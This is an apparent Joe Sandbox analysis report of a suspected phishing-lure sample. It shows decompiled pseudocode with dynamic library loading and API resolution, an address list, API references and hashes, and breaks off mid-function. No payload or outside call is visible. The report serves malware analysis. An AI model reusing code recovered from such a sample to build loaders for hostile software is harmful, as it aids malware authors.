                                                				void* _t216;
                                                				struct HINSTANCE__* _t217;
                                                				struct HINSTANCE__* _t218;
                                                				struct HINSTANCE__* _t220;
                                                				signed short _t222;
                                                				struct HINSTANCE__* _t225;
                                                				struct HINSTANCE__* _t227;
                                                				void* _t228;
                                                				intOrPtr* _t229;
                                                				void* _t240;
                                                				signed char _t241;
                                                				signed int _t242;
                                                				void* _t246;
                                                				struct HINSTANCE__* _t248;
                                                				void* _t249;
                                                				signed int _t251;
                                                				short* _t253;
                                                				signed int _t259;
                                                				void* _t260;
                                                				signed int _t263;
                                                				signed int _t266;
                                                				signed int _t267;
                                                				signed int _t272;
                                                				signed int _t273;
                                                				signed int _t274;
                                                				signed int _t275;
                                                				void* _t278;
                                                				void* _t282;
                                                				struct HINSTANCE__* _t284;
                                                				signed int _t287;
                                                				void _t288;
                                                				signed int _t289;
                                                				signed int _t301;
                                                				signed int _t302;
                                                				signed short _t308;
                                                				signed int _t309;
                                                				WCHAR* _t310;
                                                				WCHAR* _t312;
                                                				WCHAR* _t313;
                                                				struct HINSTANCE__* _t314;
                                                				void* _t316;
                                                				signed int _t318;
                                                				void* _t319;
                                                
                                                				_t284 = 0;
                                                				_v32 = 0;
                                                				_v36 = 0;
                                                				_v16 = 0;
                                                				_v8 = 0;
                                                				_v40 = 0;
                                                				_t319 = 0;
                                                				_v48 = 0;
                                                				_t199 = E1000121B();
                                                				_v24 = _t199;
                                                				_v28 = _t199;
                                                				_v44 = E1000121B();
                                                				_t309 = E10001243();
                                                				_v52 = _t309;
                                                				_v12 = _t309;
                                                				while(1) {
                                                					_t202 = _v32;
                                                					_v56 = _t202;
                                                					if(_t202 != _t284 && _t319 == _t284) {
                                                						break;
                                                					}
                                                					_t308 =  *_t309;
                                                					_t287 = _t308 & 0x0000ffff;
                                                					_t204 = _t287 - _t284;
                                                					if(_t204 == 0) {
                                                						_t33 =  &_v32;
                                                						 *_t33 = _v32 | 0xffffffff;
                                                						__eflags =  *_t33;
                                                						L17:
                                                						_t206 = _v56 - _t284;
                                                						if(_t206 == 0) {
                                                							__eflags = _t319 - _t284;
                                                							 *_v28 = _t284;
                                                							if(_t319 == _t284) {
                                                								_t246 = GlobalAlloc(0x40, 0x1ca4); // executed
                                                								_t319 = _t246;
                                                								 *(_t319 + 0x1010) = _t284;
                                                								 *(_t319 + 0x1014) = _t284;
                                                							}
                                                							_t288 = _v36;
                                                							_t43 = _t319 + 8; // 0x8
                                                							_t208 = _t43;
                                                							_t44 = _t319 + 0x808; // 0x808
                                                							_t310 = _t44;
                                                							 *_t319 = _t288;
                                                							_t289 = _t288 - _t284;
                                                							__eflags = _t289;
                                                							 *_t208 = _t284;
                                                							 *_t310 = _t284;
                                                							 *(_t319 + 0x1008) = _t284;
                                                							 *(_t319 + 0x100c) = _t284;
                                                							 *(_t319 + 4) = _t284;
                                                							if(_t289 == 0) {
                                                								__eflags = _v28 - _v24;
                                                								if(_v28 == _v24) {
                                                									goto L39;
                                                								}
                                                								_t316 = 0;
                                                								GlobalFree(_t319);
                                                								_t319 = E10001311(_v24);
                                                								__eflags = _t319 - _t284;
                                                								if(_t319 == _t284) {
                                                									goto L39;
                                                								} else {
                                                									goto L32;
                                                								}
                                                								while(1) {
                                                									L32:
                                                									_t240 =  *(_t319 + 0x1ca0);
                                                									__eflags = _t240 - _t284;
                                                									if(_t240 == _t284) {
                                                										break;
                                                									}
                                                									_t316 = _t319;
                                                									_t319 = _t240;
                                                									__eflags = _t319 - _t284;
                                                									if(_t319 != _t284) {
                                                										continue;
                                                									}
                                                									break;
                                                								}
                                                								__eflags = _t316 - _t284;
                                                								if(_t316 != _t284) {
                                                									 *(_t316 + 0x1ca0) = _t284;
                                                								}
                                                								_t241 =  *(_t319 + 0x1010);
                                                								__eflags = _t241 & 0x00000008;
                                                								if((_t241 & 0x00000008) == 0) {
                                                									_t242 = _t241 | 0x00000002;
                                                									__eflags = _t242;
                                                									 *(_t319 + 0x1010) = _t242;
                                                								} else {
                                                									_t319 = E1000158F(_t319);
                                                									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) & 0xfffffff5;
                                                								}
                                                								goto L39;
                                                							} else {
                                                								_t301 = _t289 - 1;
                                                								__eflags = _t301;
                                                								if(_t301 == 0) {
                                                									L28:
                                                									lstrcpyW(_t208, _v44);
                                                									L29:
                                                									lstrcpyW(_t310, _v24);
                                                									L39:
                                                									_v12 = _v12 + 2;
                                                									_v28 = _v24;
                                                									L63:
                                                									if(_v32 != 0xffffffff) {
                                                										_t309 = _v12;
                                                										continue;
                                                									}
                                                									break;
                                                								}
                                                								_t302 = _t301 - 1;
                                                								__eflags = _t302;
                                                								if(_t302 == 0) {
                                                									goto L29;
                                                								}
                                                								__eflags = _t302 != 1;
                                                								if(_t302 != 1) {
                                                									goto L39;
                                                								}
                                                								goto L28;
                                                							}
                                                						}
                                                						if(_t206 != 1) {
                                                							goto L39;
                                                						}
                                                						_t248 = _v16;
                                                						if(_v40 == _t284) {
                                                							_t248 = _t248 - 1;
                                                						}
                                                						 *(_t319 + 0x1014) = _t248;
                                                						goto L39;
                                                					}
                                                					_t249 = _t204 - 0x23;
                                                					if(_t249 == 0) {
                                                						__eflags = _t309 - _v52;
                                                						if(_t309 <= _v52) {
                                                							L15:
                                                							_v32 = _t284;
                                                							_v36 = _t284;
                                                							goto L17;
                                                						}
                                                						__eflags =  *((short*)(_t309 - 2)) - 0x3a;
                                                						if( *((short*)(_t309 - 2)) != 0x3a) {
                                                							goto L15;
                                                						}
                                                						__eflags = _v32 - _t284;
                                                						if(_v32 == _t284) {
                                                							L40:
                                                							_t251 = _v32 - _t284;
                                                							__eflags = _t251;
                                                							if(_t251 == 0) {
                                                								__eflags = _t287 - 0x2a;
                                                								if(_t287 == 0x2a) {
                                                									_v36 = 2;
                                                									L61:
                                                									_t309 = _v12;
                                                									_v28 = _v24;
                                                									_t284 = 0;
                                                									__eflags = 0;
                                                									L62:
                                                									_t318 = _t309 + 2;
                                                									__eflags = _t318;
                                                									_v12 = _t318;
                                                									goto L63;
                                                								}
                                                								__eflags = _t287 - 0x2d;
                                                								if(_t287 == 0x2d) {
                                                									L131:
                                                									__eflags = _t308 - 0x2d;
                                                									if(_t308 != 0x2d) {
                                                										L134:
                                                										_t253 = _t309 + 2;
                                                										__eflags =  *_t253 - 0x3a;
                                                										if( *_t253 != 0x3a) {
                                                											L141:
                                                											_v28 =  &(_v28[0]);
                                                											 *_v28 = _t308;
                                                											goto L62;
                                                										}
                                                										__eflags = _t308 - 0x2d;
                                                										if(_t308 == 0x2d) {
                                                											goto L141;
                                                										}
                                                										_v36 = 1;
                                                										L137:
                                                										_v12 = _t253;
                                                										__eflags = _v28 - _v24;
                                                										if(_v28 <= _v24) {
                                                											 *_v44 = _t284;
                                                										} else {
                                                											 *_v28 = _t284;
                                                											lstrcpyW(_v44, _v24);
                                                										}
                                                										goto L61;
                                                									}
                                                									_t253 = _t309 + 2;
                                                									__eflags =  *_t253 - 0x3e;
                                                									if( *_t253 != 0x3e) {
                                                										goto L134;
                                                									}
                                                									_v36 = 3;
                                                									goto L137;
                                                								}
                                                								__eflags = _t287 - 0x3a;
                                                								if(_t287 != 0x3a) {
                                                									goto L141;
                                                								}
                                                								goto L131;
                                                							}
                                                							_t259 = _t251 - 1;
                                                							__eflags = _t259;
                                                							if(_t259 == 0) {
                                                								L74:
                                                								_t260 = _t287 - 0x22;
                                                								__eflags = _t260 - 0x55;
                                                								if(_t260 > 0x55) {
                                                									goto L61;
                                                								}
                                                								switch( *((intOrPtr*)(( *(_t260 + 0x10002230) & 0x000000ff) * 4 +  &M100021CC))) {
                                                									case 0:
                                                										__ecx = _v24;
                                                										__edi = _v12;
                                                										while(1) {
                                                											__edi = __edi + 1;
                                                											__edi = __edi + 1;
                                                											_v12 = __edi;
                                                											__ax =  *__edi;
                                                											__eflags = __ax - __dx;
                                                											if(__ax != __dx) {
                                                												goto L116;
                                                											}
                                                											L115:
                                                											__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
                                                											if( *((intOrPtr*)(__edi + 2)) != __dx) {
                                                												L120:
                                                												 *__ecx =  *__ecx & 0x00000000;
                                                												__ebx = E1000122C(_v24);
                                                												goto L91;
                                                											}
                                                											L116:
                                                											__eflags = __ax;
                                                											if(__ax == 0) {
                                                												goto L120;
                                                											}
                                                											__eflags = __ax - __dx;
                                                											if(__ax == __dx) {
                                                												__edi = __edi + 1;
                                                												__edi = __edi + 1;
                                                												__eflags = __edi;
                                                											}
                                                											__ax =  *__edi;
                                                											 *__ecx =  *__edi;
                                                											__ecx = __ecx + 1;
                                                											__ecx = __ecx + 1;
                                                											__edi = __edi + 1;
                                                											__edi = __edi + 1;
                                                											_v12 = __edi;
                                                											__ax =  *__edi;
                                                											__eflags = __ax - __dx;
                                                											if(__ax != __dx) {
                                                												goto L116;
                                                											}
                                                											goto L115;
                                                										}
                                                									case 1:
                                                										_v8 = 1;
                                                										goto L61;
                                                									case 2:
                                                										_v8 = _v8 | 0xffffffff;
                                                										goto L61;
                                                									case 3:
                                                										_v8 = _v8 & 0x00000000;
                                                										_v20 = _v20 & 0x00000000;
                                                										_v16 = _v16 + 1;
                                                										goto L79;
                                                									case 4:
                                                										__eflags = _v20;
                                                										if(_v20 != 0) {
                                                											goto L61;
                                                										}
                                                										_v12 = _v12 - 2;
                                                										__ebx = E1000121B();
                                                										 &_v12 = E10001A9F( &_v12);
                                                										__eax = E10001470(__edx, __eax, __edx, __ebx);
                                                										goto L91;
                                                									case 5:
                                                										L99:
                                                										_v20 = _v20 + 1;
                                                										goto L61;
                                                									case 6:
                                                										_push(7);
                                                										goto L107;
                                                									case 7:
                                                										_push(0x19);
                                                										goto L127;
                                                									case 8:
                                                										_push(0x15);
                                                										goto L127;
                                                									case 9:
                                                										_push(0x16);
                                                										goto L127;
                                                									case 0xa:
                                                										_push(0x18);
                                                										goto L127;
                                                									case 0xb:
                                                										_push(5);
                                                										goto L107;
                                                									case 0xc:
                                                										__eax = 0;
                                                										__eax = 1;
                                                										goto L85;
                                                									case 0xd:
                                                										_push(6);
                                                										goto L107;
                                                									case 0xe:
                                                										_push(2);
                                                										goto L107;
                                                									case 0xf:
                                                										_push(3);
                                                										goto L107;
                                                									case 0x10:
                                                										_push(0x17);
                                                										L127:
                                                										_pop(__ebx);
                                                										goto L92;
                                                									case 0x11:
                                                										__eax =  &_v12;
                                                										__eax = E10001A9F( &_v12);
                                                										__ebx = __eax;
                                                										__ebx = __eax + 1;
                                                										__eflags = __ebx - 0xb;
                                                										if(__ebx < 0xb) {
                                                											__ebx = __ebx + 0xa;
                                                										}
                                                										goto L91;
                                                									case 0x12:
                                                										__ebx = 0xffffffff;
                                                										goto L92;
                                                									case 0x13:
                                                										_v48 = _v48 + 1;
                                                										_push(4);
                                                										_pop(__eax);
                                                										goto L85;
                                                									case 0x14:
                                                										__eax = 0;
                                                										__eflags = 0;
                                                										goto L85;
                                                									case 0x15:
                                                										_push(4);
                                                										L107:
                                                										_pop(__eax);
                                                										L85:
                                                										__edi = _v16;
                                                										__ecx =  *(0x1000305c + __eax * 4);
                                                										__edi = _v16 << 5;
                                                										__edx = 0;
                                                										__edi = (_v16 << 5) + __esi;
                                                										__edx = 1;
                                                										__eflags = _v8 - 0xffffffff;
                                                										_v40 = 1;
                                                										 *(__edi + 0x1018) = __eax;
                                                										if(_v8 == 0xffffffff) {
                                                											L87:
                                                											__ecx = __edx;
                                                											L88:
                                                											__eflags = _v8 - __edx;
                                                											 *(__edi + 0x1028) = __ecx;
                                                											if(_v8 == __edx) {
                                                												__eax =  &_v12;
                                                												__eax = E10001A9F( &_v12);
                                                												__eax = __eax + 1;
                                                												__eflags = __eax;
                                                												_v8 = __eax;
                                                											}
                                                											__eax = _v8;
                                                											 *((intOrPtr*)(__edi + 0x101c)) = _v8;
                                                											_t133 = _v16 + 0x81; // 0x81
                                                											_t133 = _t133 << 5;
                                                											__eax = 0;
                                                											__eflags = 0;
                                                											 *((intOrPtr*)((_t133 << 5) + __esi)) = 0;
                                                											 *((intOrPtr*)(__edi + 0x1030)) = 0;
                                                											 *((intOrPtr*)(__edi + 0x102c)) = 0;
                                                											goto L91;
                                                										}
                                                										__eflags = __ecx;
                                                										if(__ecx > 0) {
                                                											goto L88;
                                                										}
                                                										goto L87;
                                                									case 0x16:
                                                										_t262 =  *(_t319 + 0x1014);
                                                										__eflags = _t262 - _v16;
                                                										if(_t262 > _v16) {
                                                											_v16 = _t262;
                                                										}
                                                										_v8 = _v8 & 0x00000000;
                                                										_v20 = _v20 & 0x00000000;
                                                										_v36 - 3 = _t262 - (_v36 == 3);
                                                										if(_t262 != _v36 == 3) {
                                                											L79:
                                                											_v40 = 1;
                                                										}
                                                										goto L61;
                                                									case 0x17:
                                                										__eax =  &_v12;
                                                										__eax = E10001A9F( &_v12);
                                                										__ebx = __eax;
                                                										__ebx = __eax + 1;
                                                										L91:
                                                										__eflags = __ebx;
                                                										if(__ebx == 0) {
                                                											goto L61;
                                                										}
                                                										L92:
                                                										__eflags = _v20;
                                                										_v40 = 1;
                                                										if(_v20 != 0) {
                                                											L97:
                                                											__eflags = _v20 - 1;
                                                											if(_v20 == 1) {
                                                												__eax = _v16;
                                                												__eax = _v16 << 5;
                                                												__eflags = __eax;
                                                												 *(__eax + __esi + 0x102c) = __ebx;
                                                											}
                                                											goto L99;
                                                										}
                                                										_v16 = _v16 << 5;
                                                										_t141 = __esi + 0x1030; // 0x1030
                                                										__edi = (_v16 << 5) + _t141;
                                                										__eax =  *__edi;
                                                										__eflags = __eax - 0xffffffff;
                                                										if(__eax <= 0xffffffff) {
                                                											L95:
                                                											__eax = GlobalFree(__eax);
                                                											L96:
                                                											 *__edi = __ebx;
                                                											goto L97;
                                                										}
                                                										__eflags = __eax - 0x19;
                                                										if(__eax <= 0x19) {
                                                											goto L96;
                                                										}
                                                										goto L95;
                                                									case 0x18:
                                                										goto L61;
                                                								}
                                                							}
                                                							_t263 = _t259 - 1;
                                                							__eflags = _t263;
                                                							if(_t263 == 0) {
                                                								_v16 = _t284;
                                                								goto L74;
                                                							}
                                                							__eflags = _t263 != 1;
                                                							if(_t263 != 1) {
                                                								goto L141;
                                                							}
                                                							_t266 = _t287 - 0x21;
                                                							__eflags = _t266;
                                                							if(_t266 == 0) {
                                                								_v8 =  ~_v8;
                                                								goto L61;
                                                							}
                                                							_t267 = _t266 - 0x42;
                                                							__eflags = _t267;
                                                							if(_t267 == 0) {
                                                								L57:
                                                								__eflags = _v8 - 1;
                                                								if(_v8 != 1) {
                                                									_t92 = _t319 + 0x1010;
                                                									 *_t92 =  *(_t319 + 0x1010) &  !0x00000001;
                                                									__eflags =  *_t92;
                                                								} else {
                                                									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) | 1;
                                                								}
                                                								_v8 = 1;
                                                								goto L61;
                                                							}
                                                							_t272 = _t267;
                                                							__eflags = _t272;
                                                							if(_t272 == 0) {
                                                								_push(0x20);
                                                								L56:
                                                								_pop(1);
                                                								goto L57;
                                                							}
                                                							_t273 = _t272 - 9;
                                                							__eflags = _t273;
                                                							if(_t273 == 0) {
                                                								_push(8);
                                                								goto L56;
                                                							}
                                                							_t274 = _t273 - 4;
                                                							__eflags = _t274;
                                                							if(_t274 == 0) {
                                                								_push(4);
                                                								goto L56;
                                                							}
                                                							_t275 = _t274 - 1;
                                                							__eflags = _t275;
                                                							if(_t275 == 0) {
                                                								_push(0x10);
                                                								goto L56;
                                                							}
                                                							__eflags = _t275 != 0;
                                                							if(_t275 != 0) {
                                                								goto L61;
                                                							}
                                                							_push(0x40);
                                                							goto L56;
                                                						}
                                                						goto L15;
                                                					}
                                                					_t278 = _t249 - 5;
                                                					if(_t278 == 0) {
                                                						__eflags = _v36 - 3;
                                                						_v32 = 1;
                                                						_v8 = _t284;
                                                						_v20 = _t284;
                                                						_v16 = (0 | _v36 == 0x00000003) + 1;
                                                						_v40 = _t284;
                                                						goto L17;
                                                					}
                                                					_t282 = _t278 - 1;
                                                					if(_t282 == 0) {
                                                						_v32 = 2;
                                                						_v8 = _t284;
                                                						_v20 = _t284;
                                                						goto L17;
                                                					}
                                                					if(_t282 != 0x16) {
                                                						goto L40;
                                                					} else {
                                                						_v32 = 3;
                                                						_v8 = 1;
                                                						goto L17;
                                                					}
                                                				}
                                                				GlobalFree(_v52);
                                                				GlobalFree(_v24);
                                                				GlobalFree(_v44);
                                                				if(_t319 == _t284 ||  *(_t319 + 0x100c) != _t284) {
                                                					L161:
                                                					return _t319;
                                                				} else {
                                                					_t216 =  *_t319 - 1;
                                                					if(_t216 == 0) {
                                                						_t178 = _t319 + 8; // 0x8
                                                						_t312 = _t178;
                                                						__eflags =  *_t312 - _t284;
                                                						if( *_t312 != _t284) {
                                                							_t217 = GetModuleHandleW(_t312);
                                                							__eflags = _t217 - _t284;
                                                							 *(_t319 + 0x1008) = _t217;
                                                							if(_t217 != _t284) {
                                                								L150:
                                                								_t183 = _t319 + 0x808; // 0x808
                                                								_t313 = _t183;
                                                								_t218 = E100015FF( *(_t319 + 0x1008), _t313);
                                                								__eflags = _t218 - _t284;
                                                								 *(_t319 + 0x100c) = _t218;
                                                								if(_t218 == _t284) {
                                                									__eflags =  *_t313 - 0x23;
                                                									if( *_t313 == 0x23) {
                                                										_t186 = _t319 + 0x80a; // 0x80a
                                                										_t222 = E10001311(_t186);
                                                										__eflags = _t222 - _t284;
                                                										if(_t222 != _t284) {
                                                											__eflags = _t222 & 0xffff0000;
                                                											if((_t222 & 0xffff0000) == 0) {
                                                												 *(_t319 + 0x100c) = GetProcAddress( *(_t319 + 0x1008), _t222 & 0x0000ffff);
                                                											}
                                                										}
                                                									}
                                                								}
                                                								__eflags = _v48 - _t284;
                                                								if(_v48 != _t284) {
                                                									L157:
                                                									_t313[lstrlenW(_t313)] = 0x57;
                                                									_t220 = E100015FF( *(_t319 + 0x1008), _t313);
                                                									__eflags = _t220 - _t284;
                                                									if(_t220 != _t284) {
                                                										L145:
                                                										 *(_t319 + 0x100c) = _t220;
                                                										goto L161;
                                                									}
                                                									__eflags =  *(_t319 + 0x100c) - _t284;
                                                									L159:
                                                									if(__eflags != 0) {
                                                										goto L161;
                                                									}
                                                									L160:
                                                									_t197 = _t319 + 4;
                                                									 *_t197 =  *(_t319 + 4) | 0xffffffff;
                                                									__eflags =  *_t197;
                                                									goto L161;
                                                								} else {
                                                									__eflags =  *(_t319 + 0x100c) - _t284;
                                                									if( *(_t319 + 0x100c) != _t284) {
                                                										goto L161;
                                                									}
                                                									goto L157;
                                                								}
                                                							}
                                                							_t225 = LoadLibraryW(_t312);
                                                							__eflags = _t225 - _t284;
                                                							 *(_t319 + 0x1008) = _t225;
                                                							if(_t225 == _t284) {
                                                								goto L160;
                                                							}
                                                							goto L150;
                                                						}
                                                						_t179 = _t319 + 0x808; // 0x808
                                                						_t227 = E10001311(_t179);
                                                						 *(_t319 + 0x100c) = _t227;
                                                						__eflags = _t227 - _t284;
                                                						goto L159;
                                                					}
                                                					_t228 = _t216 - 1;
                                                					if(_t228 == 0) {
                                                						_t176 = _t319 + 0x808; // 0x808
                                                						_t229 = _t176;
                                                						__eflags =  *_t229 - _t284;
                                                						if( *_t229 == _t284) {
                                                							goto L161;
                                                						}
                                                						_t220 = E10001311(_t229);
                                                						L144:
                                                						goto L145;
                                                					}
                                                					if(_t228 != 1) {
                                                						goto L161;
                                                					}
                                                					_t80 = _t319 + 8; // 0x8
                                                					_t285 = _t80;
                                                					_t314 = E10001311(_t80);
                                                					 *(_t319 + 0x1008) = _t314;
                                                					if(_t314 == 0) {
                                                						goto L160;
                                                					}
                                                					 *(_t319 + 0x104c) =  *(_t319 + 0x104c) & 0x00000000;
                                                					 *((intOrPtr*)(_t319 + 0x1050)) = E1000122C(_t285);
                                                					 *(_t319 + 0x103c) =  *(_t319 + 0x103c) & 0x00000000;
                                                					 *((intOrPtr*)(_t319 + 0x1048)) = 1;
                                                					 *((intOrPtr*)(_t319 + 0x1038)) = 1;
                                                					_t89 = _t319 + 0x808; // 0x808
                                                					_t220 =  *(_t314->i + E10001311(_t89) * 4);
                                                					goto L144;
                                                				}
                                                			}
                                                0x10001ef8
                                                0x10001ef8
                                                0x10001efa
                                                0x10001efd
                                                0x10001f03
                                                0x00000000
                                                0x10001f03
                                                0x10001ec4
                                                0x10001ec6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10001e45
                                                0x10001e4b
                                                0x10001e4e
                                                0x10001e50
                                                0x10001e50
                                                0x10001e53
                                                0x10001e57
                                                0x10001e64
                                                0x10001e66
                                                0x10001e6c
                                                0x10001e6c
                                                0x10001e6c
                                                0x00000000
                                                0x00000000
                                                0x10001fa4
                                                0x10001fa8
                                                0x10001fad
                                                0x10001fb0
                                                0x10001f09
                                                0x10001f09
                                                0x10001f0b
                                                0x00000000
                                                0x00000000
                                                0x10001f11
                                                0x10001f11
                                                0x10001f15
                                                0x10001f1c
                                                0x10001f40
                                                0x10001f40
                                                0x10001f44
                                                0x10001f46
                                                0x10001f49
                                                0x10001f49
                                                0x10001f4c
                                                0x10001f4c
                                                0x00000000
                                                0x10001f44
                                                0x10001f21
                                                0x10001f24
                                                0x10001f24
                                                0x10001f2b
                                                0x10001f2d
                                                0x10001f30
                                                0x10001f37
                                                0x10001f38
                                                0x10001f3e
                                                0x10001f3e
                                                0x00000000
                                                0x10001f3e
                                                0x10001f32
                                                0x10001f35
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10001e3e
                                                0x10001cff
                                                0x10001cff
                                                0x10001d00
                                                0x10001e26
                                                0x00000000
                                                0x10001e26
                                                0x10001d06
                                                0x10001d07
                                                0x00000000
                                                0x00000000
                                                0x10001d0f
                                                0x10001d0f
                                                0x10001d12
                                                0x10001d5d
                                                0x00000000
                                                0x10001d5d
                                                0x10001d14
                                                0x10001d14
                                                0x10001d17
                                                0x10001d41
                                                0x10001d44
                                                0x10001d47
                                                0x10001e18
                                                0x10001e18
                                                0x10001e18
                                                0x10001d4d
                                                0x10001d4d
                                                0x10001d4d
                                                0x10001e1e
                                                0x00000000
                                                0x10001e1e
                                                0x10001d1a
                                                0x10001d1a
                                                0x10001d1b
                                                0x10001d3e
                                                0x10001d40
                                                0x10001d40
                                                0x00000000
                                                0x10001d40
                                                0x10001d1d
                                                0x10001d1d
                                                0x10001d20
                                                0x10001d3a
                                                0x00000000
                                                0x10001d3a
                                                0x10001d22
                                                0x10001d22
                                                0x10001d25
                                                0x10001d36
                                                0x00000000
                                                0x10001d36
                                                0x10001d27
                                                0x10001d27
                                                0x10001d28
                                                0x10001d32
                                                0x00000000
                                                0x10001d32
                                                0x10001d2b
                                                0x10001d2c
                                                0x00000000
                                                0x00000000
                                                0x10001d2e
                                                0x00000000
                                                0x10001d2e
                                                0x00000000
                                                0x10001bdd
                                                0x10001b7f
                                                0x10001b82
                                                0x10001bb1
                                                0x10001bb5
                                                0x10001bbc
                                                0x10001bc3
                                                0x10001bc6
                                                0x10001bc9
                                                0x00000000
                                                0x10001bc9
                                                0x10001b84
                                                0x10001b85
                                                0x10001ba0
                                                0x10001ba7
                                                0x10001baa
                                                0x00000000
                                                0x10001baa
                                                0x10001b8a
                                                0x00000000
                                                0x10001b90
                                                0x10001b90
                                                0x10001b97
                                                0x00000000
                                                0x10001b97
                                                0x10001b8a
                                                0x10001d83
                                                0x10001d88
                                                0x10001d8d
                                                0x10001d91
                                                0x100021c5
                                                0x100021cb
                                                0x10001da3
                                                0x10001da5
                                                0x10001da6
                                                0x100020ee
                                                0x100020ee
                                                0x100020f1
                                                0x100020f4
                                                0x10002111
                                                0x10002117
                                                0x10002119
                                                0x1000211f
                                                0x10002136
                                                0x10002136
                                                0x10002136
                                                0x10002143
                                                0x10002149
                                                0x1000214c
                                                0x10002152
                                                0x10002154
                                                0x10002158
                                                0x1000215a
                                                0x10002161
                                                0x10002166
                                                0x10002169
                                                0x1000216b
                                                0x10002170
                                                0x10002182
                                                0x10002182
                                                0x10002170
                                                0x10002169
                                                0x10002158
                                                0x10002188
                                                0x1000218b
                                                0x10002195
                                                0x1000219d
                                                0x100021aa
                                                0x100021b0
                                                0x100021b3
                                                0x100020e3
                                                0x100020e3
                                                0x00000000
                                                0x100020e3
                                                0x100021b9
                                                0x100021bf
                                                0x100021bf
                                                0x00000000
                                                0x00000000
                                                0x100021c1
                                                0x100021c1
                                                0x100021c1
                                                0x100021c1
                                                0x00000000
                                                0x1000218d
                                                0x1000218d
                                                0x10002193
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10002193
                                                0x1000218b
                                                0x10002122
                                                0x10002128
                                                0x1000212a
                                                0x10002130
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10002130
                                                0x100020f6
                                                0x100020fd
                                                0x10002103
                                                0x10002109
                                                0x00000000
                                                0x10002109
                                                0x10001dac
                                                0x10001dad
                                                0x100020cd
                                                0x100020cd
                                                0x100020d3
                                                0x100020d6
                                                0x00000000
                                                0x00000000
                                                0x100020dd
                                                0x100020e2
                                                0x00000000
                                                0x100020e2
                                                0x10001db4
                                                0x00000000
                                                0x00000000
                                                0x10001dba
                                                0x10001dba
                                                0x10001dc3
                                                0x10001dc8
                                                0x10001dce
                                                0x00000000
                                                0x00000000
                                                0x10001dd4
                                                0x10001de1
                                                0x10001de7
                                                0x10001df1
                                                0x10001df7
                                                0x10001dff
                                                0x10001e0f
                                                0x00000000
                                                0x10001e0f

                                                APIs
                                                  • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C24
                                                • lstrcpyW.KERNEL32 ref: 10001C6C
                                                • lstrcpyW.KERNEL32 ref: 10001C76
                                                • GlobalFree.KERNEL32 ref: 10001C89
                                                • GlobalFree.KERNEL32 ref: 10001D83
                                                • GlobalFree.KERNEL32 ref: 10001D88
                                                • GlobalFree.KERNEL32 ref: 10001D8D
                                                • GlobalFree.KERNEL32 ref: 10001F38
                                                • lstrcpyW.KERNEL32 ref: 1000209C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.514496286.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.514490574.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000000.00000002.514501973.0000000010003000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000000.00000002.514506940.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Global$Free$lstrcpy$Alloc
                                                • String ID: N)w@h)w
                                                • API String ID: 4227406936-3621727588
                                                • Opcode ID: cb62190180ed0d4702abe35055169a0b89ef54aebb667e4c8f91c694d9f7fe89
                                                • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                • Opcode Fuzzy Hash: cb62190180ed0d4702abe35055169a0b89ef54aebb667e4c8f91c694d9f7fe89
                                                • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                [Control-flow graph of function 406054 (entry block 406054-40605f); legend: Executed / Not Executed. The rendered graph and its edge list are not reproduced here.]
                                                C-Code - Quality: 74%
                                                			E00406054(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                				intOrPtr* _v8;
                                                				struct _ITEMIDLIST* _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				signed int _t48;
                                                				WCHAR* _t49;
                                                				signed char _t51;
                                                				signed int _t52;
                                                				signed int _t53;
                                                				signed int _t54;
                                                				short _t66;
                                                				short _t67;
                                                				short _t69;
                                                				short _t71;
                                                				void* _t81;
                                                				signed int _t85;
                                                				intOrPtr* _t89;
                                                				signed char _t90;
                                                				intOrPtr _t93;
                                                				void* _t98;
                                                				void* _t108;
                                                				short _t109;
                                                				signed int _t112;
                                                				void* _t113;
                                                				WCHAR* _t114;
                                                				void* _t116;
                                                
                                                				_t113 = __esi;
                                                				_t108 = __edi;
                                                				_t81 = __ebx;
                                                				_t48 = _a8;
                                                				if(_t48 < 0) {
                                                					_t93 =  *0x7a7a1c; // 0x8681a6
                                                					_t48 =  *(_t93 - 4 + _t48 * 4);
                                                				}
                                                				_push(_t81);
                                                				_push(_t113);
                                                				_push(_t108);
                                                				_t89 =  *0x7a8a78 + _t48 * 2;
                                                				_t49 = 0x7a69e0;
                                                				_t114 = 0x7a69e0;
                                                				if(_a4 >= 0x7a69e0 && _a4 - 0x7a69e0 >> 1 < 0x800) {
                                                					_t114 = _a4;
                                                					_a4 = _a4 & 0x00000000;
                                                				}
                                                				while(1) {
                                                					_t109 =  *_t89;
                                                					if(_t109 == 0) {
                                                						break;
                                                					}
                                                					__eflags = (_t114 - _t49 & 0xfffffffe) - 0x800;
                                                					if((_t114 - _t49 & 0xfffffffe) >= 0x800) {
                                                						break;
                                                					}
                                                					_t98 = 2;
                                                					_t89 = _t89 + _t98;
                                                					__eflags = _t109 - 4;
                                                					_v8 = _t89;
                                                					if(__eflags >= 0) {
                                                						if(__eflags != 0) {
                                                							 *_t114 = _t109;
                                                							_t114 = _t114 + _t98;
                                                							__eflags = _t114;
                                                						} else {
